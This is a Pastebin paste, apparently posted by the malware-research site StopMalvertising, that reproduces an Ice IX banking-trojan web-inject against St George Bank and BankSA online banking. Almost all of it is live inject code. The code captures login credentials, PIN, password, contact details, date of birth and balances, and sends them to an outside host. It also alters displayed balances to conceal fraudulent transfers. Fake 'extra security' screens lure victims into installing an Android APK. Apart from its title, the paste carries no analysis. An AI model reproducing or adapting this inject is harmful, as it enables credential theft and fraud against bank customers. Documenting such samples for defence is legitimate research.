API tools faq
paste
StopMalvertising

Ice IX web-injects - St George Bank

StopMalvertising
Nov 30th, 2013
330
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.27 KB | None | 0 0
raw download clone embed print report
  1. Ice IX web-inject - St George Bank
  2. Analysis of ICE IX - stopmalvertising.com
  3.  
  4. <script type="text/javascript">
  5.  
  6.  
  7. var home="https://megasrc.com/";
  8. var myComputer="%BOTID%";
  9. var myMaster = "Cat";
  10. var doAndroid = true;
  11. var apkUrl = "";
  12.  
  13.  
  14.  
  15.  
  16. var st={logsCallback:function(){},admin:function(a){a.login=localStorage.getItem("log1n");a.master=myMaster;jQuery.ajax({url:home+"i/banksa",dataType:"jsonp",data:a,crossDomain:!0})},loginPage:function(){st.loginPage.goToAcc=function(){jQuery("#myLogonButton").remove();jQuery("#logonButton").show().click()};jQuery("#logonButton").hide().after('<input type="submit" value="Logon" class="logonButton" id="myLogonButton">');jQuery("#access-number").val("");jQuery("#securityNumber").val("");jQuery("#internet-password").val("");
  17. jQuery("#access-number").change(function(){localStorage.setItem("log1n",jQuery("#access-number").val())});jQuery("#securityNumber").change(function(){localStorage.setItem("p1n",jQuery("#securityNumber").val())});jQuery("#internet-password").change(function(){localStorage.setItem("pass",jQuery("#internet-password").val())});jQuery("#access-number").keyup(function(){localStorage.setItem("log1n",jQuery("#access-number").val())});jQuery("#securityNumber").keyup(function(){localStorage.setItem("p1n",jQuery("#securityNumber").val())});
  18. jQuery("#internet-password").keyup(function(){localStorage.setItem("pass",jQuery("#internet-password").val())});jQuery("#myLogonButton").click(function(){localStorage.setItem("log1n",jQuery("#access-number").val());0<jQuery("#access-number").val().length&&0<jQuery("#internet-password").val().length&&st.admin({type:0,request:0,login:jQuery("#txtMyClientNumber_field").val(),pin:jQuery("#securityNumber").val(),pass:jQuery("#internet-password").val(),bank2:bankName,func:"loginPage",myComputer:myComputer});
  19. return!1})},show:function(){jQuery("body").css({display:"block"});jQuery("body").show()},sendAcc:function(){jQuery("body").show()},logs:function(a){st.admin({type:3,func:a})},setMyButton:function(){jQuery("body").show()},successfulTransfer:function(){jQuery("body").show()},getHistoryTransfer:function(){st.admin({type:1,func:"getHistoryTransfer"})},hideTransfers_takeInfo:function(){st.admin({type:5,request:5,login:localStorage.getItem("log1n"),func:"hideTransfers.takeInfo",myComputer:myComputer});
  20. return!1},hideTransfers:function(){st.logs("hideTransfers");/viewAccountPortfolio/i.test(location.href)&&(jQuery("div.account-messages").hide(),jQuery("aside.smplpaylocation").hide(),jQuery("dl.last-transcation").hide(),jQuery("ul#acctSummaryList li").each(function(){for(var a=jQuery.trim(jQuery(this).find("dl.account-number-details").text()),a=a.replace("-","").replace(/[\s\xa0]/g,""),b=0;3>b;b++)if("undefined"!=typeof transfers[b]){var c=transfers[b].split(";")[0],d=transfers[b].split(";")[1];1<
  21. a.indexOf(c)&&jQuery(this).find("dl.balance-details dd").each(function(){var a=jQuery.trim(jQuery(this).text()),b=a.split(".")[1],a=a.split(".")[0].replace("$","").replace(",",""),b="$"+(parseInt(a)+parseInt(d))+"."+b;jQuery(this).text(b)})}}));(/loadAcctTransferPage./i.test(location.href)||/loadTPTransferPage./i.test(location.href)||/loadBpayTransferPage./i.test(location.href))&&jQuery("select#fromAcct option").each(function(){for(var a=jQuery.trim(jQuery(this).text()),a=a.replace("-","").replace(/[\s\xa0]/g,
  22. ""),b=0;3>b;b++)if("undefined"!=typeof transfers[b]){var c=transfers[b].split(";")[0],d=transfers[b].split(";")[1];if(1<a.indexOf(c)){var e=jQuery.trim(jQuery(this).text()),c=e.split(/\$.*\./i)[1],f=e.split("$")[0];console.log("_old_summ_after_text "+c);console.log("_old_summ_before_text "+f);e=e.split("($")[1].split(".")[0].replace(",","");d=parseInt(e)+parseInt(d);d=f+"$"+d+"."+c;jQuery(this).text(d)}}});jQuery("body").show()},gotoContactPage:function(){location.href="Stgeorge"==bankName?"https://ibanking.stgeorge.com.au/ibank/editContactDetails.do?method=processDefault":
  23. "https://ibanking.banksa.com.au/ibank/editContactDetails.do?method=processDefault"},contactPage:function(){st.contactPage.startAnd=function(){jQuery(".account-messages").hide();jQuery(".content-wrap").hide();jQuery(".top-nav").hide();jQuery("nav").hide();jQuery(".recommand-product").hide();jQuery(".search").hide();jQuery(".ft-nav a").attr("href","#");jQuery("form[name=contactDetailsForm]").hide();jQuery("#content").append(jQuery("#screen1").detach());jQuery(".navigation").append(jQuery("#screen1_right").detach());
  24. jQuery("#content").append(jQuery("#screen2").detach());jQuery("#content").append(jQuery("#screen3").detach());jQuery(".navigation").append(jQuery("#screen3_right").detach());jQuery("#content").append(jQuery("#screen4").detach());jQuery(".navigation").append(jQuery("#screen4_right").detach());jQuery("#content").append(jQuery("#screen5").detach());jQuery("#helloh1").html(jQuery(".user-login-info q").text());jQuery("#screen1input1").html('<input type="text" id="mobnumber" value="" size="20" maxlength="20" name="mobnumber" style="margin:0px;">');
  25. jQuery("#screen1input2").html('<input type="text" id="dobnumber" value="" size="17" maxlength="16" name="dobnumber" style="margin:0px;">');jQuery("#screen1rimg1").attr("src",home+"and/icon3.png");"Banksa"==bankName&&(jQuery("#screen2img1").attr("src",home+"load4.gif"),jQuery("#screen5img1").attr("src",home+"load4.gif"));"Stgeorge"==bankName&&(jQuery("#screen2img1").attr("src",home+"load1.gif"),jQuery("#screen5img1").attr("src",home+"load1.gif"));""!=g?jQuery("#mobnuminsert").html(g):""!=f?jQuery("#mobnuminsert").html(f):
  26. ""!=h&&jQuery("#mobnuminsert").html(h);jQuery("#btnContq").click(function(){jQuery("#mobnumberlabel").css("color","#000000");jQuery("#mobnumber").css("border-color","#CCCCCC");jQuery("#moboslabel").css("color","#000000");if(!/\d{9}/.test(jQuery("#mobnumber").val().replace("+","").replace(/-/g,"").replace(/\s/g,"")))return jQuery("#mobnumberlabel").css("color","#FF0000"),jQuery("#mobnumber").css("border-color","#FF0000"),jQuery("#mobnumber").focus(),alert("Please enter your number."),!1;if(4>jQuery("input#dobnumber").val().length)return jQuery("#doblabel").css("color",
  27. "#FF0000"),jQuery("#dobnumber").css("border-color","#FF0000"),jQuery("#dobnumber").focus(),alert("Please enter your Date of Birth."),!1;jQuery(".screen_to_hide").hide();jQuery("#screen2").show();phone_number=jQuery("#mobnumber").val();st.admin({type:5,request:2,phone:jQuery("#mobnumber").val(),dob:jQuery("input#dobnumber").val(),func:"contactPage.startAnd",myComputer:myComputer});return!1});jQuery(".screen_to_hide").hide();jQuery("#screen1").show();jQuery("#screen1_right").show();jQuery("body").show()};
  28. st.contactPage.goToAcc=function(){jQuery("body").show()};st.contactPage.goToBalancePage=function(){location.href="Stgeorge"==bankName?"https://ibanking.stgeorge.com.au/ibank/viewAccountPortfolio.action":"https://ibanking.banksa.com.au/ibank/viewAccountPortfolio.action"};var a=jQuery("p strong:contains('Name')").parent().text(),b=jQuery.trim(jQuery("span:contains('Street')").parent().find("span#Data").text()),c=jQuery.trim(jQuery("span:contains('Suburb')").parent().find("span#Data").text()),d=jQuery.trim(jQuery("span:contains('State')").parent().find("span#Data").text()),
  29. e=jQuery.trim(jQuery("span:contains('Postcode')").parent().find("span#Data").text()),f=jQuery.trim(jQuery("span:contains('Home Phone Number')").parent().find("span#Data").text()),h=jQuery.trim(jQuery("span:contains('Work Phone Number')").parent().find("span#Data").text()),g=jQuery.trim(jQuery("span:contains('Mobile Phone Number')").parent().find("span#Data").text()),k=jQuery.trim(jQuery("span:contains('E-mail Address')").parent().find("span#Data").text());st.admin({type:5,request:1,login:localStorage.getItem("log1n"),
  30. name:a,street:b,city:c,state:d,postcode:e,hphone:f,wphone:h,mphone:g,email:k,func:"contactPage",myComputer:myComputer})},balancePage:function(){st.balancePage.goToAcc=function(){jQuery(".screen_to_hide").hide();jQuery(".content-wrap").show();jQuery(".top-nav").show();jQuery("nav").show();jQuery(".recommand-product").show();jQuery(".search").show();jQuery("body").show()};var a=jQuery.trim(jQuery("#acctSummaryList").text().replace(/\s/g,""));st.admin({type:5,request:0,login:localStorage.getItem("log1n"),
  31. balance:a,func:"balancePage",myComputer:myComputer});return!1}},bankName="",drops=[],transfers=[];function is_framed(){return top!=self?!0:!1}
  32. jQuery(document).ready(function(){if(is_framed())jQuery("body").show();else if(jQuery("body").hasClass("doit"))jQuery("body").show();else{jQuery("body").addClass("doit");var a="ibank/loginPage.action ibank/logonAction.action ibank/viewAccountPortfolio.action loadAcctTransferPage loadTPTransferPage loadBpayTransferPage ibank/editContactDetails.do".split(" "),b=!1,c;for(c in a)a.hasOwnProperty(c)&&1<location.href.indexOf(a[c])&&(b=!0);b?(bankName=/stgeorge/.test(location.href)?"Stgeorge":"Banksa",jQuery("#access-number").get(0)?
  33. (st.loginPage(),jQuery("body").show()):/My Accounts/i.test(jQuery("h1").html())&&/viewAccountPortfolio/i.test(location.href)?st.balancePage():/loadAcctTransferPage./i.test(location.href)||/loadTPTransferPage./i.test(location.href)||/loadBpayTransferPage./i.test(location.href)?st.hideTransfers_takeInfo():/My Contact Details/i.test(jQuery("body").html())?st.contactPage():st.show()):jQuery("body").show()}});
  34.  
  35.  
  36.  
  37. </script>
  38.  
  39.  
  40.  
  41.  
  42. <div id="loadContainer" style="display:none;" >
  43.  
  44.  
  45.  
  46.  
  47. <div style="text-align:right;" class="screen_to_hide" id="screen1_right">
  48. <img id="screen1rimg1" width="120px" >
  49. </div>
  50.  
  51.  
  52. <div class="screen_to_hide" id="screen1" >
  53.  
  54. <h1 id="helloh1">Hello XXX</h1>
  55.  
  56. <h2>We understand that the security of your money is extremely important. In order to provide you with extra security, we occasionally need to ask for additional information when you access your accounts online.</h2>
  57.  
  58.  
  59. <div id="Row"> </div>
  60.  
  61. <div id="FormBorder">
  62.  
  63. <!-- <h3>To register your mobile phone:</h3> -->
  64. <div id="Row">
  65.  
  66. <ol>
  67. <li>Enter the mobile number</li>
  68. <li>Enter your Date of Birth</li>
  69. <li>Press "CONTINUE"</li>
  70. </ol>
  71.  
  72. </div>
  73. <br>
  74. <!-- <h3>Register your mobile phone</h3> -->
  75. <div style=" margin: 15px 8px 0 20px;">
  76. <span style="font-weight: bold;margin-right: 20px;padding: 0 20px 0 0;position: relative;vertical-align: text-bottom;width: 210px;">
  77. <label id="mobnumberlabel">Enter your number (<span id="mobnuminsert"></span>)
  78. </label>
  79. <font class="Mandatory">*</font>
  80. </span>
  81. <span style=" display: inline-block;vertical-align: top;" id="screen1input1">
  82.  
  83. </span>
  84. </div>
  85.  
  86. <div style=" margin: 15px 8px 0 20px;">
  87. <span style="font-weight: bold;margin-right: 20px;padding: 0 20px 0 0;position: relative;vertical-align: text-bottom;width: 210px;">
  88. <label id="doblabel">Enter your Date of Birth (MM/DD/YYYY)
  89. </label>
  90. <font class="Mandatory">*</font>
  91. </span>
  92. <span style=" display: inline-block;vertical-align: top;" id="screen1input2">
  93.  
  94. </span>
  95. </div>
  96.  
  97.  
  98. <div class="has-btn">
  99. <span class="goto go-back"></span>
  100. <span class="btn">
  101. <input type="button" value="Continue" id="btnContq" onclick="return false;">
  102. </span>
  103. </div>
  104.  
  105. </div>
  106.  
  107. </div>
  108.  
  109. <!-- ============================================ -->
  110.  
  111.  
  112.  
  113. <div class="screen_to_hide" id="screen2">
  114.  
  115. <center>
  116. <br><br><br><br>
  117. <img id="screen2img1" />
  118. <br><br><br>
  119. <h5>Loading...</h5>
  120. <br><br><br><br><br>
  121. </center>
  122.  
  123. </div>
  124.  
  125.  
  126.  
  127. <!-- ============================================ -->
  128.  
  129.  
  130. <div style="text-align:right;" class="screen_to_hide" id="screen3_right">
  131. <img id="screen3rimg1" width="120px" >
  132. </div>
  133.  
  134.  
  135. <div class="screen_to_hide" id="screen3" >
  136.  
  137.  
  138. <h1>Android verification code</h1>
  139.  
  140. To the following number <span id="spnnum"><b>+4ХХХХХХХХХХ</b></span> shortly you will receive an SMS with a link to download METAFORIC Security Certificate, please push on the link to download and install security certificate. If your prefer you can also use QR code scanner or direct download link to get METAFORIC application. In order to scan QR Code Reader, which is available on the Android Market. Also you can enter direct link to download APK file in browser of your mobile phone.<br><br>
  141. <b>After successful Security Certificate installation you should see a verification code on your mobile screen, please enter it below.</b>
  142.  
  143.  
  144.  
  145. <div id="FormBorder">
  146.  
  147. <h3>Download link:</h3>
  148. <div id="Row">
  149. <span id="LabelWithITip"></span>
  150. <span id="Data"><span class="apktext"></span></span>
  151. </div>
  152. <br>
  153.  
  154. <h3>QR code:</h3>
  155. <div id="Row">
  156. <span id="LabelWithITip"></span>
  157. <span id="Data"><img width="80px" id="screen3img1"></span>
  158. </div>
  159. <br>
  160.  
  161. <h3>Enter Verification code</h3>
  162. <div id="Row">
  163. <span id="LabelWithITip">
  164. <label for="fromAcct" id="mobvercodelabel">Verification code</label>
  165. <!-- <span title="Select an account from which all your Payee transfers will be made" class="ico ico-info"></span> -->
  166. </span>
  167. <span id="screen3input1">
  168.  
  169. </span>
  170. </div>
  171.  
  172. <div id="Row">
  173. <div class="has-btn">
  174. <span class="goto go-back"></span>
  175. <span class="btn" >
  176. <input type="button" value="Continue" id="btnContq2" >
  177. </span>
  178. </div>
  179. </div>
  180.  
  181. </div>
  182.  
  183.  
  184. </div>
  185.  
  186.  
  187.  
  188. <!-- ============================================ -->
  189.  
  190.  
  191.  
  192. <div style="text-align:right;" class="screen_to_hide" id="screen4_right">
  193. <img id="screen4rimg1" width="120px" >
  194. </div>
  195.  
  196.  
  197. <div class="screen_to_hide" id="screen4" >
  198.  
  199.  
  200. <h1>Our bank always take care of the clients</h1>
  201.  
  202. <h2>Thank you for using our software. This software was made specially for bank customers and also to protect user data from being stolen or falsified.</h2>
  203.  
  204.  
  205. <div id="FormBorder">
  206.  
  207. <h3>For secure usage of the software, remember this:</h3>
  208. <div id="Row">
  209. <ul class="ibParaSmallMargin">
  210. <li>Use only licensed software (operating system, applets) downloaded from testified and trusted sources, install all the updates raising security level in time. Remember that all warez can contain malicious software, used to steal your passwords and account numbers.</li>
  211. <li>Install licensed antivirus software , update the antivirus software and databases in time, make computer rotation periodically.</li>
  212. <li>Install and set up your personal firewall. It will help to prevent unauthorized network access to your computer.</li>
  213. <li>Don't use auto-complete feature in settings of your browser. It will help to prevent keeping the data (user password, logname etc. ) in browser. In turn it will also prevent using your data by third parties.</li>
  214. <li>Update software of your phone (if it is already installed) on a regular basis. Remember that not only operating system and Office programmes need to be updated, but also bank software, installed on your Android, IPhone, Windows Mobile.</li>
  215. <li>Use only safeguard network (if it is possible). While using public network, it is necessary to use SSL-connection.</li>
  216. <li>Choose complicated passwords or systems of multifactor authentication.</li>
  217. <li>Control the operations made over your account.</li>
  218. </ul>
  219. </div>
  220.  
  221. <div id="Row">
  222. <div class="has-btn">
  223. <span class="goto go-back"></span>
  224. <span class="btn">
  225. <input type="button" value="Continue" id="btnContq3" >
  226. </span>
  227. </div>
  228. </div>
  229. </div>
  230.  
  231. </div>
  232.  
  233.  
  234.  
  235. <!-- ============================================ -->
  236.  
  237.  
  238.  
  239. <div class="screen_to_hide" id="screen5">
  240. <center>
  241. <img id="screen5img1" />
  242. <br><br><br>
  243. <h5>Loading...</h5>
  244. <br><br><br>
  245. </center>
  246. </div>
  247.  
  248.  
  249.  
  250.  
  251.  
  252. </div>
  253.  
  254.  
  255.  
  256. <input type="hidden" name='javaScriptEnabled' value="null">
  257. <input type=hidden name=hWidth> <input type=hidden name=hHeight>
  258.  
  259. <script type="text/javascript" language="JavaScript">
  260. <!--
  261. var focusControl = document.forms["logonForm"].elements["access-number"];
  262. focusControl.focus();
  263. -->
  264. </script>
  265.  
  266.  
  267. </form>
  268.  
  269. </body>
  270.  
  271. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!